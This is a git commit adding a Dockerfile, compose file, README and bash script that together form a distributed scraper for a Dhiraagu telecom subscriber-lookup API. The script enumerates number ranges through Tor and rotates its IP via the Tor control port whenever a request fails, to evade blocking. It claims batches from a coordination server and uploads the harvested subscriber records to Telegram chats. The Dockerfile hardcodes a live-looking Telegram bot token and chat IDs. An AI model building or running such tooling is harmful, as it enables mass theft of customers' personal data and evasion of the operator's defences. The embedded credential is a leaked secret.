This commit is contained in:
Shihaam Abdul Rahman 2023-03-08 12:53:04 +05:00
commit 679fa4a816
Signed by: shihaam
GPG Key ID: 6DA2E87EBC227636
4 changed files with 129 additions and 0 deletions

20
Dockerfile Normal file
View File

@ -0,0 +1,20 @@
FROM debian:11-slim
WORKDIR /root/
RUN apt-get update && \
apt-get install -y --no-install-recommends tor curl jq ca-certificates netcat && \
apt-get autoclean && apt-get autopurge
RUN sed -i 's/#ControlPort 9051/ControlPort 9051/g' /etc/tor/torrc && \
sed -i 's/#CookieAuthentication 1/CookieAuthentication 0/g' /etc/tor/torrc && \
sed -i '$aSocksPort 0.0.0.0:9050' /etc/tor/torrc
COPY scrap.sh /root/
RUN chmod +x /root/scrap.sh
ENV TG_BOT_TOKEN=5932159946:AAFtuXAeQo7fldmcEYOvFwaOHqguE6oYjLw
ENV CHAT_IDS='("-1001813993440" "673263332")'
CMD service tor start && /root/scrap.sh

17
README.md Normal file
View File

@ -0,0 +1,17 @@
```yml
version: '3.5'
services:
#########################
dscrap:
image: git.shihaam.dev/dockerfiles/dhiraagu-scrapper
environment:
- SCRAPPER_CONTROL_API_KEY= #GET KEY FROM ATHFAN
# - TG_BOT_TOKEN= # modify if needed, default value set during build
# - CHAT_IDS=# modify if needed, default value set during build
# ports:
# - 9050:9050
restart: always
```

6
docker-compose.yml Normal file
View File

@ -0,0 +1,6 @@
version: '3.5'
services:
#########################
dscrap:
build: .
image: git.shihaam.dev/dockerfiles/dhiraagu-scrapper

86
scrap.sh Normal file
View File

@ -0,0 +1,86 @@
#!/bin/bash
# API, API KEY, BOT TOKEN, CHATIDS
#SCRAPPER_CONTROL_API_KEY=<from env>
#TG_BOT_TOKEN=<from env>
#CHAT_IDS=<from env>
SCRAP_URL="https://app-production.dhiraagu.com.mv/io/v1/info/subscribers"
SCRAPPER_CONTROL_API_URL="https://scraper-control.awfulshit.xyz/api/dhiraagu-number"
TELEGRAM_API_URL=
# REPEAT AFTER FILE UPLOAD
while true; do
# LOOKING FOR FREE BITCHES
GET_FREE_BATCH=$(curl --request GET --url "$SCRAPPER_CONTROL_API_URL"/next-batch --header "Authorization: Bearer $SCRAPPER_CONTROL_API_KEY" --header "Content-Type: application/json")
BATCH_NUMBER=$(echo $GET_FREE_BATCH | jq -r '.batch_number')
echo "First availible batch: $BATCH_NUMBER."
# CLAIMING A FREE BITCH
CLAIM_FREE_BATCH=$(curl --request POST --url "$SCRAPPER_CONTROL_API_URL"/next-batch/$BATCH_NUMBER --header "Authorization: Bearer $SCRAPPER_CONTROL_API_KEY" --header "Content-Type: application/json")
BATCH_START=$(echo $GET_FREE_BATCH | jq -r '.batch_start')
BATCH_END=$(echo $GET_FREE_BATCH | jq -r '.batch_end')
# CANCEL THE BITCH ON STOP
function CANCEL {
echo "SCRIPT STOP REQUESTED, POSTING A CANCEL REQUEST TO SCRAPPER_CONTROL_API_URL"
CANCEL_BATCH=$(curl --request POST --url "$SCRAPPER_CONTROL_API_URL"/next-batch/$BATCH_NUMBER/cancel --header "Authorization: Bearer $SCRAPPER_CONTROL_API_KEY" --header "Content-Type: application/json")
echo "BATCH CANCELLED. STOPPING SCRIPT."
rm $FILENAME
exit
}
# SCRAP THE FREE BITCH
START_NUM=$BATCH_START
NUM=$START_NUM
END_NUM=$((BATCH_END+1))
FILENAME=${BATCH_START}-${BATCH_END}.json
# CHECK IF RANFE IS ASCENDING OR DESCENDING
if [ "$START_NUM" -le "$END_NUM" ]; then
step=1
else
step=-1
fi
# UPDATE THE LOOP DEPENDING ON ABOVE STEP
while [ "$START_NUM" -ne "$END_NUM" ]; do
echo "Scraping: $NUM" # LOG SCRAPPING NUMBER
curl -si --socks5 127.0.0.1:9050 "$SCRAP_URL/$NUM/dir" > .cache
DATA=$(tail -n1 .cache) # GET JSON DATA
HTTP_STATUS=$(head -n1 .cache | awk '{print $2}') # GET HEADER
trap CANCEL SIGINT
if [ "$HTTP_STATUS" = "200" ]; then # IF DATA IS AVAILIBLE
echo "$DATA" | tee -a "$FILENAME"
printf "\n" | tee -a "$FILENAME"
START_NUM=$(expr "$START_NUM" + "$step")
printf -v NUM "%06d" "$START_NUM"
else
echo "";echo "COULD NOT GET DATA, GETTING NEW IP.";
#systemctl restart tor
#service tor restart
#echo -e 'AUTHENTICATE ""\r\nSIGNAL NEWNYM\r\nQUIT' | nc -U /var/run/tor/control
#printf 'AUTHENTICATE ""\r\nSIGNAL NEWNYM\r\nQUIT' | nc localhost 9051
printf 'AUTHENTICATE ""\r\nSIGNAL NEWNYM\r\nQUIT' | nc -w 1 localhost 9051
echo ""
sleep 1
fi
done
# COMPLETED SCRAPPING BITCH
BATCH_COMPLETE=$(curl --request POST --url "$SCRAPPER_CONTROL_API_URL"/next-batch/$BATCH_NUMBER/finish --header "Authorization: Bearer $SCRAPPER_CONTROL_API_KEY" --header "Content-Type: application/json")
BATCH_NUMBER=$(echo $BATCH_COMPLETE | jq -r '.batch.batch_number')
COMPLETED_BY=$(echo $BATCH_COMPLETE | jq -r '.batch.completed_by.name')
CAPTION=$(echo -e "$FILENAME COMPLETED.\nBATCH $BATCH_NUMBER COMPLETED BY $COMPLETED_BY." | tr '[:lower:]' '[:upper:]')
echo $CAPTION
# UPLOAD SCRAPPED BITCH FILE TO TELEGRAM
for CHAT_ID in "${CHAT_IDS[@]}"
do
curl -s -F chat_id=$CHAT_ID -F caption="$CAPTION" -F document=@$FILENAME "https://api.telegram.org/bot$TOKEN/sendDocument" > /dev/null
done
rm $FILENAME
done